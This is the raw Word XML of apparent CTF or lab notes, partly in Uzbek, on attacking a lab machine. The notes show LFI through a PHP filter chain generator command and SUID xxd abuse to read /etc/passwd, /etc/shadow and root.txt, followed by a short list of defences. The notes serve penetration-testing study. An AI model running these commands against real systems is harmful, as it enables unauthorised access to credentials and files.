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C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26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</w:pPr>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26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</w:pPr>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRPr="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26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</w:pPr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LFILE=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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file_to_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRPr="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26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./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> "$LFILE" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26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Example: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26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</w:pPr>
      <w:proofErr w:type="gramStart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./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r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–</w:t>
      </w:r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r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRPr="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26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./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 xml:space="preserve"> "/root/root.txt</w:t>
      </w:r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 xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B57C26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</w:rPr>
        <w:t xml:space="preserve"> -r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079195B" w:rsidRDefault="0079195B"/>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26"/>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00CF43D7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://exploit-notes.hdks.org/exploit/web/security-risk/php-filters-chain/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26"/>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26"/>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26">
      <w:r w:rsidRPr="00B57C26">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="306FFFFD" wp14:editId="2A94A29B">
            <wp:extent cx="5943600" cy="22828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26" w:rsidRDefault="00B57C26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00CF43D7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://10.10.184.205/secret-script.php?file=</w:t>
        </w:r>
        <w:r w:rsidRPr="00CF43D7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:b/>
          </w:rPr>
          <w:t>supersecretadminpanel.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57C26">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>supersecretadminpanel.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>” =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26">
      <w:r w:rsidRPr="00B57C26">
        <w:t>python3 php_filter_chain_generator.py --chain '&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B57C26">
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B57C26">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B57C26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B57C26">
        <w:t>phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B57C26">
        <w:t>(); ?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26"/>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linkFor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57C26">
        <w:rPr>
          <w:b/>
          <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
        </w:rPr>
        <w:t>php_filter_chain_generator.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57C26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57C26">
        <w:t>https://github.com/synacktiv/php_filter_chain_generator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26" w:rsidP="00B57C26">
      <w:r w:rsidRPr="00B57C26">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52CCAA4A" wp14:editId="2F477888">
            <wp:extent cx="5943600" cy="31692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26" w:rsidRDefault="00B57C26"/>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26">
      <w:r w:rsidRPr="00B57C26">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13229A2F" wp14:editId="3B97DCEB">
            <wp:extent cx="5943600" cy="41497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26" w:rsidRDefault="00B57C26">
      <w:r w:rsidRPr="00B57C26">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5086656B" wp14:editId="6FCECFD9">
            <wp:extent cx="5943600" cy="35610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26" w:rsidRDefault="00B57C26"/>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26">
      <w:r w:rsidRPr="00B57C26">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CB398BF" wp14:editId="408B182C">
            <wp:extent cx="5943600" cy="1913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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A3BC9D2" wp14:editId="4E18D5F4">
            <wp:extent cx="5943600" cy="3724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26" w:rsidRDefault="00B57C26">
      <w:r w:rsidRPr="00B57C26">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="557C1734" wp14:editId="616E75ED">
            <wp:extent cx="5943600" cy="1188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26" w:rsidRDefault="00B57C26"/>
    <w:p w:rsidR="00B57C26" w:rsidRDefault="00B57C26">
      <w:r w:rsidRPr="00B57C26">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53DE3D36" wp14:editId="2DEF89CF">
            <wp:extent cx="5943600" cy="36442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/>
    <w:p w:rsidR="002A1A77" w:rsidRDefault="002A1A77">
      <w:r w:rsidRPr="002A1A77">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25E786F6" wp14:editId="63C79574">
            <wp:extent cx="5943600" cy="17392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/>
    <w:p w:rsidR="002A1A77" w:rsidRDefault="002A1A77"/>
    <w:p w:rsidR="002A1A77" w:rsidRDefault="002A1A77">
      <w:r w:rsidRPr="002A1A77">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08B420D1" wp14:editId="015BB2D1">
            <wp:extent cx="5801535" cy="94310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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48412C0D" wp14:editId="0743CAF7">
            <wp:extent cx="5943600" cy="1304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6A" w:rsidRDefault="00013C6A">
      <w:r w:rsidRPr="00013C6A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1785C58D" wp14:editId="01F88001">
            <wp:extent cx="5943600" cy="21507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6A" w:rsidRDefault="00013C6A">
      <w:r w:rsidRPr="00013C6A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C932062" wp14:editId="034E1151">
            <wp:extent cx="5943600" cy="65849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/>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013C6A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Make Public key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A1A77" w:rsidRDefault="002A1A77">
      <w:r w:rsidRPr="002A1A77">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1759C5C3" wp14:editId="3A54F099">
            <wp:extent cx="5943600" cy="39192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6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="002A1A77" w:rsidRDefault="002A1A77">
      <w:r w:rsidRPr="002A1A77">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BF35AD5" wp14:editId="1D232D51">
            <wp:extent cx="5943600" cy="10902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/>
    <w:p w:rsidR="002A1A77" w:rsidRDefault="002A1A77">
      <w:r w:rsidRPr="002A1A77">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D0134F4" wp14:editId="47C95344">
            <wp:extent cx="5943600" cy="2687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F7" w:rsidRDefault="003506F7">
      <w:r w:rsidRPr="003506F7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A19E645" wp14:editId="33F6A389">
            <wp:extent cx="5943600" cy="2019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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73A21107" wp14:editId="39124B6C">
            <wp:extent cx="5544324" cy="100026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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D677BE6" wp14:editId="5D144001">
            <wp:extent cx="5943600" cy="51917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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CD49CA7" wp14:editId="447E25BA">
            <wp:extent cx="4867954" cy="5858693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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7967EB22" wp14:editId="36D0187F">
            <wp:extent cx="5943600" cy="43167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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F85B519" wp14:editId="6AF73A84">
            <wp:extent cx="5943600" cy="26339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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72AE0B12" wp14:editId="5DA04C94">
            <wp:extent cx="4791744" cy="179095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>
      <w:r w:rsidRPr="002A1A77">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CC6C52A" wp14:editId="0E11B965">
            <wp:extent cx="5943600" cy="9861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6A" w:rsidRDefault="00013C6A">
      <w:r w:rsidRPr="00013C6A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6FAF92" wp14:editId="5B4C2A42">
            <wp:extent cx="5943600" cy="4838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6A" w:rsidRDefault="00013C6A">
      <w:r w:rsidRPr="00013C6A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D87FAA5" wp14:editId="2E1E1754">
            <wp:extent cx="5943600" cy="34969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6A" w:rsidRDefault="00013C6A">
      <w:r w:rsidRPr="00013C6A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2162EB20" wp14:editId="7A81E938">
            <wp:extent cx="5943600" cy="234124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6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A"/>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A">
      <w:r>
        <w:t>Info:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRDefault="00013C6A">
      <w:r w:rsidRPr="00013C6A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CB7202E" wp14:editId="586763E4">
            <wp:extent cx="5943600" cy="62617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6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013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Ha,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buyruğidan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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>noto‘g‘ri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imtiyozlar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yoki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noto‘g‘ri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sozlangan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tizim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xavfsizligi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bo‘lsa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hujum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usuli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sifatida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foydalanish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mumkin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Ushbu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usuldan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imtiyozli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fayllarni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o‘qish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yoki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oshkor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qilish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uchun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foydalanish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mumkin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Pr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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Tahlil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va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xavfsizlik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muammosi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="0001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3C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LFILE=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file_to_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="0001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proofErr w:type="gram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"$LFILE" |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-r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013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kod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nima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qiladi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013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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13C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00013C6A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"$LFILE"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Berilgan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C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$LFILE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faylini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heksadecimal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formatga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aylantiradi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Pr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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13C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00013C6A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-r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Heksadecimal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formatni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asl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holiga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qaytaradi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Pr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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Bunda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hech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qanday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o‘zgarish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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bo‘lmaydi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lekin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natija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standart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chiqishga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stdout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chiqariladi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Pr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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Agar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imtiyozlar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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>noto‘g‘ri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sozlangan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bo‘lsa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13C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LFILE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maxfiy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yoki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ruxsatsiz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fayl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bo‘lsa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foydalanuvchi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ushbu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buyruq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orqali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faylning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tarkibini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ko‘rishi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mumkin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Pr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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Misol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: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maxfiy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faylni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o‘qish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013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Agar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oddiy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foydalanuvchi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C6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>/shadow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faylini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o‘qishga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harakat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qilsa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odatda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bunga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ruxsat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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bo‘lmaydi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13C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="0001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13C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gram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>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013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xatolik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beradi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13C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="0001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13C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00013C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: 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>/shadow: Permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013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Ammo agar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imtiyozi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bilan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ishlatilsa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yoki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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>noto‘g‘ri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sozlangan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ruxsatlari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bo‘lsa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, u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holda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bu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faylni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quyidagicha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o‘qish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mumkin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13C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="0001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3C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LFILE=/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>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="0001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proofErr w:type="gram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"$LFILE" |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-r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013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Agar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ushbu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buyruqni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ishga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tushirishga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ruxsat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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bo‘lsa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13C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="0001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013C6A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/shadow |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-r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013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Bu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holda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C6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>/shadow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tarkibi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ochiq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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ko‘rinadi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Pr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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Xavfsizlik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t>chorasi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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13C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xxd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ga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imtiyozli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ruxsatlar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bermaslik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: Agar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orqali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ishlatilsa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konfiguratsiyasini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tekshirish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kerak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 xml:space="preserve"> -l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013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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Fayllar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ruxsatini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to‘g‘ri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sozlash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Muhim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tizim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fayllari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13C6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>/shadow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C6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013C6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passwd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, SSH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kalitlari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boshqalar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faqat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kerakli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foydalanuvchilarga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o‘qish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huquqi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bilan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cheklanishi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lozim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Pr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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Audit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va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monitoring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ning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foydalanish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yozuvlarini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kuzatish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shubhali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harakatlarni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aniqlash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uchun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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auditd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yoki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C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syslog</w:t>
      </w:r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tekshirish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Pr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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3C6A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013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013C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013C6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Xulosa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00013C6A" w:rsidRPr="00013C6A" w:rsidRDefault="00013C6A" w:rsidP="00013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13C6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xxd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oddiy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hexadecimal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konvertor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bo‘lsa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ham, u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noto‘g‘ri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sozlangan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tizimlarda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imtiyozli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fayllarni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oshkor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qilish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uchun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ishlatilishi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mumkin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Tizim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administratorlari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bu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kabi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usullarga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qarshi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tegishli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xavfsizlik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choralarini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C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ko‘rishlari</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0001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C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kerak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00013C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3C6A" w:rsidRDefault="003506F7">
      <w:r w:rsidRPr="003506F7">
        <w:t>https://youtu.be/V6tS5iPIX08?si=f1ylm72ycvuZG46_</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00013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2C53D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68E6C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22E6D34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53A8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C65"/>
    <w:rsid w:val="00013C6A"/>
    <w:rsid w:val="002A1A77"/>
    <w:rsid w:val="003506F7"/>
    <w:rsid w:val="0079195B"/>
    <w:rsid w:val="00B57C26"/>
    <w:rsid w:val="00F5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33F0EB-8461-4BEE-A968-F2B7D52F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13C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57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7C26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57C26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B57C2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013C6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013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013C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://10.10.184.205/secret-script.php?file=supersecretadminpanel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exploit-notes.hdks.org/exploit/web/security-risk/php-filters-chain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2025-02-06T10:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-06T10:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>